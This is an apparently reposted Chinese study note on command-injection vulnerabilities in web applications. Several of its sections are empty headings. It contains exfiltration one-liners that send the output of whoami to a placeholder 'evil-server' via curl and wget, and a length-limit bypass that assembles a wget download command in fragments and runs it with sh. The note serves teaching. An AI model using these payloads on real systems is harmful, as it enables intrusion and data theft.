其他分享
首页 > 其他分享> > Web安全学习笔记 命令注入漏洞浅析

Web安全学习笔记 命令注入漏洞浅析

作者:互联网

Web安全学习笔记 命令注入漏洞浅析

学习目录



1. 简介

命令注入通常是值因为Web应用程序在服务器上拼接系统命令而造成的漏洞

该类漏洞通常出现在调用外部程序完成一些功能的情景下出现。

比如一些Web管理界面的配置(主机名/IP/掩码/网关查看系统信息以及关闭重启等)功能,或者一些站点提供如pingnslookup提供发送邮件转换图片等功能都可能出现该类漏洞。

2. 常见危险函数

2.1. PHP

2.2. Python

2.3. Java

3. 常见注入方式

4. 无回显技巧

curl http://evil-server/$(whoami)
wget http://evil-server/$(whoami)

5. 常见绕过方式

5.1. 空格绕过

5.2. 黑名单绕过

5.3. 长度限制绕过

>wget\
>foo.\
>com
ls -t>a
sh a

上面的方法为通过命令行重定向写入命令,接着通过ls按时间排序把命令写入文件,最后执行 直接在Linux终端下执行的话,创建文件需要在重定向符号之前添加命令 这里可以使用一些诸如w,[之类的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能结束,这样就等于标准输入流的重定向 而在php中 , 使用 shell_exec 等执行系统命令的函数的时候 , 是不存在标准输入流的,所以可以直接创建文件

6. 常用符号

6.1. 命令分隔符

6.2. 通配符

7. 防御

标签:Web,shell,漏洞,exec,cat,命令,绕过,浅析
来源: https://www.cnblogs.com/icml8/p/16272820.html